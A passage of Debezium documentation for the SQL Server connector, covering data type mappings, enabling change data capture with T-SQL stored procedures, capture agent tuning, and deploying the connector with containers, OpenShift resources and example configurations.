Server connector\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BIT`\n|`BOOLEAN`\n|n\/a\n\n|`TINYINT`\n|`INT16`\n|n\/a\n\n|`SMALLINT`\n|`INT16`\n|n\/a\n\n|`INT`\n|`INT32`\n|n\/a\n\n|`BIGINT`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`FLOAT[(N)]`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`TEXT`\n|`STRING`\n|n\/a\n\n|`NCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`NVARCHAR[(N)]`\n|`STRING`\n|n\/a\n\n|`NTEXT`\n|`STRING`\n|n\/a\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document\n\n|`DATETIMEOFFSET[(P)]`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT\n\n|===\n\nOther data type mappings are described in the following sections.\n\nIf present, a column's default value is propagated to the corresponding field's Kafka Connect schema.\nChange messages contain the field's default value (unless an explicit column value was given), so there is rarely a need to obtain the default value from the schema.\nifdef::community[]\nPassing the default value nevertheless helps satisfy the compatibility rules when xref:{link-avro-serialization}[using Avro] as the serialization format together with the Confluent schema registry.\nendif::community[]
serialization format together with the Confluent schema registry.\nendif::community[]\n\n[[sql-server-temporal-values]]\n==== Temporal values\n\nOther than SQL Server's `DATETIMEOFFSET` data type (which contains time zone information), the other temporal types depend on the value of the `time.precision.mode` configuration property. When `time.precision.mode` is set to `adaptive` (the default), the connector determines the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:\n\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time` +\n +\nRepresents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime` +\n +\nRepresents the number of microseconds past midnight, and does not include timezone information.\n\n|`TIME(7)`\n|`INT64`\n|`io.debezium.time.NanoTime` +\n +\nRepresents the number of nanoseconds past midnight, and does not include timezone information.\n\n|`DATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(0)`, `DATETIME2(1)`, `DATETIME2(2)`, `DATETIME2(3)`\n|`INT64`\n|`io.debezium.time.Timestamp` +\n +\nRepresents the number of milliseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(4)`, `DATETIME2(5)`, `DATETIME2(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp` +\n +\nRepresents the number of microseconds past the epoch, and does not include timezone information.\n\n|`DATETIME2(7)`\n|`INT64`\n|`io.debezium.time.NanoTimestamp` +\n +\nRepresents the number of nanoseconds past the epoch, and does not include timezone information.\n\n|===\n\nWhen the `time.precision.mode` configuration property is set to `connect`, the connector uses the predefined Kafka Connect logical types. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since SQL Server supports tenth-of-a-microsecond precision, the events generated by a connector with the `connect` time precision mode *result in a loss of precision* when the database column has a _fractional second precision_ value greater than 3:\n\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|SQL Server data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date` +\n +\nRepresents the number of days since the epoch.\n\n|`TIME([P])`\n|`INT64`\n|`org.apache.kafka.connect.data.Time` +\n +\nRepresents the number of milliseconds since midnight, and does not include timezone information. 
SQL Server allows `P` to be in the range 0-7 to store up to a tenth of a microsecond of precision, though this mode results in a loss of precision when `P` > 3.\n\n|`DATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`SMALLDATETIME`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information.\n\n|`DATETIME2`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp` +\n +\nRepresents the number of milliseconds since the epoch, and does not include timezone information. SQL Server allows `P` to be in the range 0-7 to store up to a tenth of a microsecond of precision, though this mode results in a loss of precision when `P` > 3.\n\n|===\n\n[[sql-server-timestamp-values]]\n===== Timestamp values\n\nThe `DATETIME`, `SMALLDATETIME`, and `DATETIME2` types represent a timestamp without time zone information.\nSuch columns are converted into an equivalent Kafka Connect value based on UTC.\nFor instance, the `DATETIME2` value \"2018-06-20 15:13:16.945104\" is represented by an `io.debezium.time.MicroTimestamp` with the value \"1529507596945104\".\n\nNote that the timezone of the JVM running Kafka Connect and {prodname} does not affect this conversion.\n\n
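As an informal cross-check of this conversion, you can compute the same value in Transact-SQL with `DATEDIFF_BIG` (available in SQL Server 2016 and later).\nThe following sketch is illustrative only and plays no part in the connector's own conversion logic:\n\n[source,sql]\n----\n-- Number of microseconds between the epoch and the DATETIME2 value,\n-- matching the io.debezium.time.MicroTimestamp representation above.\nSELECT DATEDIFF_BIG(MICROSECOND, '1970-01-01 00:00:00',\n CAST('2018-06-20 15:13:16.945104' AS DATETIME2(6)));\n-- Returns 1529507596945104\n----\n\n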
[id=\"sql-server-decimal-values\"]\n==== Decimal values\n\n{prodname} connectors handle decimals according to the setting of the xref:{link-sqlserver-connector}#sqlserver-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property].\n\ndecimal.handling.mode=precise::\n+\n.Mappings when `decimal.handling.mode=precise`\n[cols=\"30%a,15%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type\n|Literal type (schema type)\n|Semantic type (schema name)\n\n|`NUMERIC[(P[,S])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`DECIMAL[(P[,S])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`SMALLMONEY`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`MONEY`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|===\n\ndecimal.handling.mode=double::\n+\n.Mappings when `decimal.handling.mode=double`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`SMALLMONEY[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`MONEY[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|===\n\ndecimal.handling.mode=string::\n+\n.Mappings when `decimal.handling.mode=string`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|SQL Server type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`SMALLMONEY[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`MONEY[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-sql-server-for-use-with-the-debezium-sql-server-connector\n\/\/Title: Setting up SQL Server to run a {prodname} connector\n[[setting-up-sqlserver]]\n== Setting up SQL Server\n\nFor {prodname} to capture change events from SQL Server tables, a SQL Server administrator with the necessary privileges must first run a query to enable CDC on the database.\nThe administrator must then enable CDC for each table that you want {prodname} to capture.\n\n[NOTE]\n====\nBy default, JDBC connections to Microsoft SQL Server are protected by SSL encryption.\nIf SSL is not enabled for a SQL Server database, or if you want to connect to the database without using SSL, you can disable SSL by setting the value of the `database.encrypt` property in connector configuration to `false`.\n====\n\nifdef::product[]\n\nFor details about setting up SQL Server for use with the {prodname} connector, see the following sections:\n\n* xref:enabling-cdc-on-the-sql-server-database[]\n* xref:enabling-cdc-on-a-sql-server-table[]\n* xref:verifying-debezium-connector-access-to-the-cdc-table[]\n* xref:debezium-sql-server-connector-on-azure[]\n* xref:effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency[]\n* xref:sql-server-capture-job-agent-configuration-parameters[]\n\nendif::product[]\n\nAfter CDC is enabled, it captures all of the `INSERT`, `UPDATE`, and `DELETE` operations that are committed to the CDC-enabled tables.\nThe {prodname} connector can then capture these events and emit them to Kafka topics.\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-the-sql-server-database\n=== Enabling CDC on the SQL Server database\n\nBefore you can enable CDC for a table, you must enable it for the SQL Server database.\nA SQL Server administrator enables CDC by running a system stored procedure.\nSystem stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You are a member of the _sysadmin_ fixed server role for the SQL Server.\n* You are a member of the `db_owner` fixed database role for the database.\n* The SQL Server Agent is running.\n\nNOTE: The SQL Server CDC feature processes changes that occur in user-created tables only. You cannot enable CDC on the SQL Server `master` database.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration* and then click *Enable Database for CDC*.\n. In the template, replace the database name in the `USE` statement with the name of the database that you want to enable for CDC.\n. 
Run the stored procedure `sys.sp_cdc_enable_db` to enable the database for CDC.\n+\nAfter the database is enabled for CDC, a schema with the name `cdc` is created, along with a CDC user, metadata tables, and other system objects.\n+\nThe following example shows how to enable CDC for the database `MyDB`:\n+\n.Example: Enabling a SQL Server database for the CDC template\n[source,sql]\n----\nUSE MyDB\nGO\nEXEC sys.sp_cdc_enable_db\nGO\n----\n\n\/\/ Type: procedure\n\/\/ ModuleID: enabling-cdc-on-a-sql-server-table\n=== Enabling CDC on a SQL Server table\n\nA SQL Server administrator must enable change data capture on the source tables that you want {prodname} to capture.\nThe database must already be enabled for CDC.\nTo enable CDC on a table, a SQL Server administrator runs the stored procedure `sys.sp_cdc_enable_table` for the table.\nThe stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\nSQL Server CDC must be enabled for every table that you want to capture.\n\n.Prerequisites\n* CDC is enabled on the SQL Server database.\n* The SQL Server Agent is running.\n* You are a member of the `db_owner` fixed database role for the database.\n\n.Procedure\n. From the *View* menu in SQL Server Management Studio, click *Template Explorer*.\n. In the *Template Browser*, expand *SQL Server Templates*.\n. Expand *Change Data Capture > Configuration*, and then click *Enable Table Specifying Filegroup Option*.\n. In the template, replace the database name in the `USE` statement with the name of the database that contains the table that you want to capture.\n. Run the stored procedure `sys.sp_cdc_enable_table`.\n+\nThe following example shows how to enable CDC for the table `MyTable`:\n+\n.Example: Enabling CDC for a SQL Server table\n[source,sql]\n----\nUSE MyDB\nGO\n\nEXEC sys.sp_cdc_enable_table\n@source_schema = N'dbo',\n@source_name = N'MyTable', \/\/<.>\n@role_name = N'MyRole', \/\/<.>\n@filegroup_name = N'MyDB_CT',\/\/<.>\n@supports_net_changes = 0\nGO\n----\n<.> Specifies the name of the table that you want to capture.\n<.> Specifies a role `MyRole` to which you can add users to whom you want to grant `SELECT` permission on the captured columns of the source table.\nUsers in the `sysadmin` or `db_owner` role also have access to the specified change tables. Set the value of `@role_name` to `NULL` to allow only members of the `sysadmin` or `db_owner` roles to have full access to captured information.\n<.> Specifies the `filegroup` where SQL Server places the change table for the captured table.\nThe named `filegroup` must already exist.\nIt is best not to locate change tables in the same `filegroup` that you use for source tables.\n\n
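To confirm that CDC is now enabled for the table, you can optionally check the `is_tracked_by_cdc` flag in the `sys.tables` catalog view.\nThe following sketch reuses the `MyDB` and `MyTable` names from the preceding example:\n\n[source,sql]\n----\nUSE MyDB\nGO\n-- A value of 1 in is_tracked_by_cdc indicates that CDC is enabled for the table.\nSELECT name, is_tracked_by_cdc\nFROM sys.tables\nWHERE name = 'MyTable';\nGO\n----\n\n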
\/\/ Type: procedure\n\/\/ ModuleID: verifying-debezium-connector-access-to-the-cdc-table\n=== Verifying that the user has access to the CDC table\n\nA SQL Server administrator can run a system stored procedure to query a database or table to retrieve its CDC configuration information.\nThe stored procedures can be run by using SQL Server Management Studio, or by using Transact-SQL.\n\n.Prerequisites\n* You have `SELECT` permission on all of the captured columns of the capture instance.\nMembers of the `db_owner` database role can view information for all of the defined capture instances.\n* You have membership in any gating roles that are defined for the table information that the query includes.\n\n.Procedure\n\n. From the *View* menu in SQL Server Management Studio, click *Object Explorer*.\n. From the Object Explorer, expand *Databases*, and then expand your database object, for example, *MyDB*.\n. Expand *Programmability > Stored Procedures > System Stored Procedures*.\n. Run the `sys.sp_cdc_help_change_data_capture` stored procedure to query the table.\n+\nQueries should not return empty results.\n+\nThe following example runs the stored procedure `sys.sp_cdc_help_change_data_capture` on the database `MyDB`:\n+\n.Example: Querying a table for CDC configuration information\n[source, sql]\n----\nUSE MyDB;\nGO\nEXEC sys.sp_cdc_help_change_data_capture\nGO\n----\n+\nThe query returns configuration information for each table in the database that is enabled for CDC and that contains change data that the caller is authorized to access.\nIf the result is empty, verify that the user has privileges to access both the capture instance and the CDC tables.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-sql-server-connector-on-azure\n[[sqlserver-on-azure]]\n=== SQL Server on Azure\n\nThe {prodname} SQL Server connector can be used with SQL Server on Azure.\nRefer to https:\/\/docs.microsoft.com\/en-us\/samples\/azure-samples\/azure-sql-db-change-stream-debezium\/azure-sql-db-change-stream-debezium\/[this example] for configuring CDC for SQL Server on Azure and using it with {prodname}.\n\nifdef::community[]\n\n[[sqlserver-always-on-replica]]\n=== SQL Server Always On\n\nThe SQL Server connector can capture changes from an Always On read-only replica.\n\n.Prerequisites\n* Change data capture is configured and enabled on the primary node.\nSQL Server does not support CDC directly on replicas.\n* The configuration option `database.applicationIntent` is set to `ReadOnly`.\nThis is required by SQL Server.\nWhen {prodname} detects this configuration option, it responds by taking the following actions:\n\n** Sets `snapshot.isolation.mode` to `snapshot`, which is the only transaction isolation mode supported for read-only replicas.\n** Commits the (read-only) transaction in every execution of the streaming query loop, which is necessary to get the latest view of CDC data.\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: effect-of-sql-server-capture-job-agent-configuration-on-server-load-and-latency\n=== Effect of SQL Server capture job agent configuration on server load and latency\n\nWhen a database administrator enables change data capture for a source table, the capture job agent begins to run.\nThe agent reads new change event records from the transaction log and replicates the event records to a change data table.\nBetween the time that a change is committed in the source table, and the time that the change appears in the corresponding change table, there is always a small latency interval.\nThis latency interval represents a gap between when changes occur in the source table and when they become available for {prodname} to stream to Apache Kafka.\n\nIdeally, for applications that must respond quickly to changes in data, you want to maintain close synchronization between the source and change tables.\nYou might imagine that running the capture agent to continuously process change events as rapidly as possible might result in increased throughput and reduced latency, populating change tables with new event records as soon as possible after the events occur, in near real time.\nHowever, this is not necessarily the case.\nThere is a performance penalty to pay in the pursuit of more immediate synchronization.\nEach time that the capture job agent queries the database for new 
event records, it increases the CPU load on the database host.\nThe additional load on the server can have a negative effect on overall database performance, and potentially reduce transaction efficiency, especially during times of peak database use.\n\nIt's important to monitor database metrics so that you know if the database reaches the point where the server can no longer support the capture agent's level of activity.\nIf you notice performance problems, there are SQL Server capture agent settings that you can modify to help balance the overall CPU load on the database host with a tolerable degree of latency.\n\n\/\/ Type: reference\n\/\/ ModuleID: sql-server-capture-job-agent-configuration-parameters\n=== SQL Server capture job agent configuration parameters\n\nOn SQL Server, parameters that control the behavior of the capture job agent are defined in the SQL Server table link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-tables\/dbo-cdc-jobs-transact-sql?view=latest[`msdb.dbo.cdc_jobs`].\nIf you experience performance issues while running the capture job agent, adjust capture job settings to reduce CPU load by running the link:https:\/\/docs.microsoft.com\/en-us\/sql\/relational-databases\/system-stored-procedures\/sys-sp-cdc-change-job-transact-sql?view=latest[`sys.sp_cdc_change_job`] stored procedure and supplying new values, as shown in the sketch that follows the parameter list.\n\n[NOTE]\n====\nSpecific guidance about how to configure SQL Server capture job agent parameters is beyond the scope of this documentation.\n====\n\nThe following parameters are the most significant for modifying capture agent behavior for use with the {prodname} SQL Server connector:\n\n`pollinginterval`::\n* Specifies the number of seconds that the capture agent waits between log scan cycles.\n* A higher value reduces the load on the database host and increases latency.\n* A value of `0` specifies no wait between scans.\n* The default value is `5`.\n\n`maxtrans`::\n* Specifies the maximum number of transactions to process during each log scan cycle.\nAfter the capture job processes the specified number of transactions, it pauses for the length of time that the `pollinginterval` specifies before the next scan begins.\n* A lower value reduces the load on the database host and increases latency.\n* The default value is `500`.\n\n`maxscans`::\n* Specifies a limit on the number of scan cycles that the capture job can attempt in capturing the full contents of the database transaction log.\nIf the `continuous` parameter is set to `1`, the job pauses for the length of time that the `pollinginterval` specifies before it resumes scanning.\n* A lower value reduces the load on the database host and increases latency.\n* The default value is `10`.\n\n
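The following sketch reduces the capture job load by scanning less frequently and processing fewer transactions per scan.\nThe parameter values are illustrative only; appropriate values depend on your workload.\nAs described in the SQL Server documentation, the new values take effect only after the capture job is restarted:\n\n[source,sql]\n----\nUSE MyDB\nGO\nEXEC sys.sp_cdc_change_job\n @job_type = N'capture',\n @pollinginterval = 10, -- wait longer between log scan cycles\n @maxtrans = 250, -- process fewer transactions per scan cycle\n @maxscans = 5; -- attempt fewer scan cycles\nGO\n-- Restart the capture job so that the new values take effect.\nEXEC sys.sp_cdc_stop_job @job_type = N'capture';\nGO\nEXEC sys.sp_cdc_start_job @job_type = N'capture';\nGO\n----\n\n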
.Additional resources\n* For more information about capture agent parameters, see the SQL Server documentation.\n\n\/\/ Type: assembly\n\/\/ ModuleID: deployment-of-debezium-sql-server-connectors\n\/\/ Title: Deployment of {prodname} SQL Server connectors\n[[sqlserver-deploying-a-connector]]\n== Deployment\n\nifdef::community[]\nTo deploy a {prodname} SQL Server connector, you install the {prodname} SQL Server connector archive, configure the connector, and start the connector by adding its configuration to Kafka Connect.\n\n.Prerequisites\n* link:https:\/\/zookeeper.apache.org\/[Apache ZooKeeper], link:http:\/\/kafka.apache.org\/[Apache Kafka], and link:{link-kafka-docs}.html#connect[Kafka Connect] are installed.\n* SQL Server is installed, is xref:{link-sqlserver-connector}#setting-up-sqlserver[configured for CDC], and is ready to be used with the {prodname} connector.\n\n.Procedure\n. Download the {prodname} https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-sqlserver\/{debezium-version}\/debezium-connector-sqlserver-{debezium-version}-plugin.tar.gz[SQL Server connector plug-in archive].\n. Extract the files into your Kafka Connect environment.\n. Add the directory with the JAR files to {link-kafka-docs}\/#connectconfigs[Kafka Connect's `plugin.path`].\n. xref:{link-sqlserver-connector}#sqlserver-example-configuration[Configure the connector] and xref:{link-sqlserver-connector}#sqlserver-adding-connector-configuration[add the configuration to your Kafka Connect cluster.]\n. Restart your Kafka Connect process to pick up the new JAR files.\n\nIf you are working with immutable containers, see link:https:\/\/hub.docker.com\/r\/debezium\/[{prodname}'s container images] for Apache ZooKeeper, Apache Kafka, and Kafka Connect.\nYou can pull the official link:https:\/\/hub.docker.com\/_\/microsoft-mssql-server[container images for Microsoft SQL Server on Linux] from Docker Hub.\n\nYou can also xref:operations\/openshift.adoc[run {prodname} on Kubernetes and OpenShift].\nendif::community[]\n\nifdef::product[]\nYou can use either of the following methods to deploy a {prodname} SQL Server connector:\n\n* xref:openshift-streams-sqlserver-connector-deployment[Use {StreamsName} to automatically create an image that includes the connector plug-in].\n+\nThis is the preferred method.\n* xref:deploying-debezium-sqlserver-connectors[Build a custom Kafka Connect container image from a Dockerfile].\n\n.Additional resources\n\n* xref:descriptions-of-debezium-sqlserver-connector-configuration-properties[]\n\n\/\/ Type: concept\n[id=\"openshift-streams-sqlserver-connector-deployment\"]\n=== SQL Server connector deployment using {StreamsName}\n\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-streams-deployment.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n[id=\"using-streams-to-deploy-debezium-sqlserver-connectors\"]\n=== Using {StreamsName} to deploy a {prodname} SQL Server connector\ninclude::{partialsdir}\/modules\/all-connectors\/proc-using-streams-to-deploy-a-debezium-connector.adoc[leveloffset=+1]\n\n\/\/ Type: procedure\n\/\/ ModuleID: deploying-debezium-sqlserver-connectors\n[[sql-server-deploying-a-connector]]\n=== Deploying a {prodname} SQL Server connector by building a custom Kafka Connect container image from a Dockerfile\n\nTo deploy a {prodname} SQL Server connector, you must build a custom Kafka Connect container image that contains the {prodname} connector archive, and then push this container image to a container registry.\nYou then need to create the following custom resources (CRs):\n\n* A `KafkaConnect` CR that defines your Kafka Connect instance.\n The `image` property in the CR specifies the name of the container image that you create to run your {prodname} connector.\n You apply this CR to the OpenShift instance where link:https:\/\/access.redhat.com\/products\/red-hat-amq#streams[Red Hat {StreamsName}] is deployed.\n {StreamsName} offers operators and images that bring Apache Kafka to OpenShift.\n\n* A `KafkaConnector` CR that defines your {prodname} SQL Server connector.\n Apply this CR to the same OpenShift instance where you apply the `KafkaConnect` CR.\n\n.Prerequisites\n\n* SQL Server is running and you completed the steps to 
{LinkDebeziumUserGuide}#setting-up-sql-server-for-use-with-the-debezium-sql-server-connector[set up SQL Server to work with a {prodname} connector].\n\n* {StreamsName} is deployed on OpenShift and is running Apache Kafka and Kafka Connect.\n For more information, see link:{LinkDeployStreamsOpenShift}[{NameDeployStreamsOpenShift}].\n\n* Podman or Docker is installed.\n\n* You have an account and permissions to create and manage containers in the container registry (such as `quay.io` or `docker.io`) to which you plan to add the container that will run your {prodname} connector.\n\n.Procedure\n\n. Create the {prodname} SQL Server container for Kafka Connect:\n\n.. Create a Dockerfile that uses `{DockerKafkaConnect}` as the base image.\nFor example, from a terminal window, enter the following command:\n+\n[source,shell,subs=\"+attributes,+quotes\"]\n----\ncat <<EOF >debezium-container-for-sqlserver.yaml \/\/ <1>\nFROM {DockerKafkaConnect}\nUSER root:root\nRUN mkdir -p \/opt\/kafka\/plugins\/debezium \/\/ <2>\nRUN curl -O {red-hat-maven-repository}debezium\/debezium-connector-{connector-file}\/{debezium-version}-redhat-__<build_number>__\/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip\nUSER 1001\nEOF\n----\n<1> You can specify any file name that you want.\n<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.\n+\nThe command creates a Dockerfile with the name `debezium-container-for-sqlserver.yaml` in the current directory.\n\n.. Build the container image from the `debezium-container-for-sqlserver.yaml` Dockerfile that you created in the previous step.\nFrom the directory that contains the file, open a terminal window and enter one of the following commands:\n+\n[source,shell,options=\"nowrap\"]\n----\npodman build -t debezium-container-for-sqlserver:latest .\n----\n+\n[source,shell,options=\"nowrap\"]\n----\ndocker build -t debezium-container-for-sqlserver:latest .\n----\nThe preceding commands build a container image with the name `debezium-container-for-sqlserver`.\n\n.. Push your custom image to a container registry, such as quay.io or an internal container registry.\nThe container registry must be available to the OpenShift instance where you want to deploy the image.\nEnter one of the following commands:\n+\n[source,shell,subs=\"+quotes\"]\n----\npodman push _<myregistry.io>_\/debezium-container-for-sqlserver:latest\n----\n+\n[source,shell,subs=\"+quotes\"]\n----\ndocker push _<myregistry.io>_\/debezium-container-for-sqlserver:latest\n----\n\n.. Create a new {prodname} SQL Server KafkaConnect custom resource (CR).\nFor example, create a KafkaConnect CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:\n+\n[source,yaml,subs=\"+attributes\"]\n----\napiVersion: {KafkaConnectApiVersion}\nkind: KafkaConnect\nmetadata:\n name: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: \"true\" \/\/ <1>\nspec:\n #...\n image: debezium-container-for-sqlserver \/\/ <2>\n----\n<1> `metadata.annotations` indicates to the Cluster Operator that KafkaConnector resources are used to configure connectors in this Kafka Connect cluster.\n<2> `spec.image` specifies the name of the image that you created to run your {prodname} connector.\nThis property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.\n\n.. 
Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc create -f dbz-connect.yaml\n----\n+\nThe command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.\n\n. Create a `KafkaConnector` custom resource that configures your {prodname} SQL Server connector instance.\n+\nYou configure a {prodname} SQL Server connector in a `.yaml` file that specifies the configuration properties for the connector.\nThe connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed.\n+\nThe following example configures a {prodname} connector that connects to a SQL Server host, `192.168.99.100`, on port `1433`.\nThis host has a database named `testDB`, a table with the name `customers`, and `fulfillment` is the server's logical name.\n+\n.SQL Server `fulfillment-connector.yaml`\n[source,yaml,subs=\"+attributes\",options=\"nowrap\"]\n----\napiVersion: {KafkaConnectorApiVersion}\nkind: KafkaConnector\nmetadata:\n name: fulfillment-connector \/\/ <1>\n labels:\n strimzi.io\/cluster: my-connect-cluster\n annotations:\n strimzi.io\/use-connector-resources: 'true'\nspec:\n class: io.debezium.connector.sqlserver.SqlServerConnector \/\/ <2>\n config:\n database.hostname: 192.168.99.100 \/\/ <3>\n database.port: 1433 \/\/ <4>\n database.user: debezium \/\/ <5>\n database.password: dbz \/\/ <6>\n database.names: testDB1,testDB2 \/\/ <7>\n topic.prefix: fulfillment \/\/ <8>\n table.include.list: dbo.customers \/\/ <9>\n schema.history.internal.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 \/\/ <10>\n schema.history.internal.kafka.topic: schemahistory.fulfillment \/\/ <11>\n database.ssl.truststore: path\/to\/trust-store \/\/ <12>\n database.ssl.truststore.password: password-for-trust-store \/\/ <13>\n----\n+\n.Descriptions of connector configuration settings\n[cols=\"1,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Item |Description\n\n|1\n|The name of our connector when we register it with a Kafka Connect service.\n\n|2\n|The name of this SQL Server connector class.\n\n|3\n|The address of the SQL Server instance.\n\n|4\n|The port number of the SQL Server instance.\n\n|5\n|The name of the SQL Server user.\n\n|6\n|The password for the SQL Server user.\n\n|7\n|The comma-separated list of the SQL Server database names from which to capture changes.\n\n|8\n|The topic prefix for the SQL Server instance\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.\n\n|9\n|A list of all tables whose changes {prodname} should capture.\n\n|10\n|The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.\n\n|11\n|The name of the database schema history topic where the connector will write and recover DDL statements. 
This topic is for internal use only and should not be used by consumers.\n\n|12\n|The path to the SSL truststore that stores the server's signer certificates.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n\n|13\n|The SSL truststore password.\nThis property is required unless database encryption is disabled (`database.encrypt=false`).\n\n|===\n\n. Create your connector instance with Kafka Connect.\n For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:\n+\n[source,shell,options=\"nowrap\"]\n----\noc apply -f fulfillment-connector.yaml\n----\n+\nThe preceding command registers `fulfillment-connector` and the connector starts to run against the `testDB` database as defined in the `KafkaConnector` CR.\n\n[id=\"verifying-that-the-debezium-sqlserver-connector-is-running\"]\n=== Verifying that the {prodname} SQL Server connector is running\n\ninclude::{partialsdir}\/modules\/all-connectors\/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]\n\nendif::product[]\n\nifdef::community[]\n[[sqlserver-example-configuration]]\n=== SQL Server connector configuration example\n\nFollowing is an example of the configuration for a connector instance that captures data from a SQL Server instance at port 1433 on 192.168.99.100, which we logically name `fullfillment`.\nTypically, you configure the {prodname} SQL Server connector in a JSON file by setting the configuration properties that are available for the connector.\n\nYou can choose to produce events for a subset of the schemas and tables in a database.\nOptionally, you can ignore, mask, or truncate columns that contain sensitive data, that are larger than a specified size, or that you do not need.\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.sqlserver.SqlServerConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"1433\", \/\/ <4>\n \"database.user\": \"sa\", \/\/ <5>\n \"database.password\": \"Password!\", \/\/ <6>\n \"database.names\": \"testDB1,testDB2\", \/\/ <7>\n \"topic.prefix\": \"fullfillment\", \/\/ <8>\n \"table.include.list\": \"dbo.customers\", \/\/ <9>\n \"schema.history.internal.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"schema.history.internal.kafka.topic\": 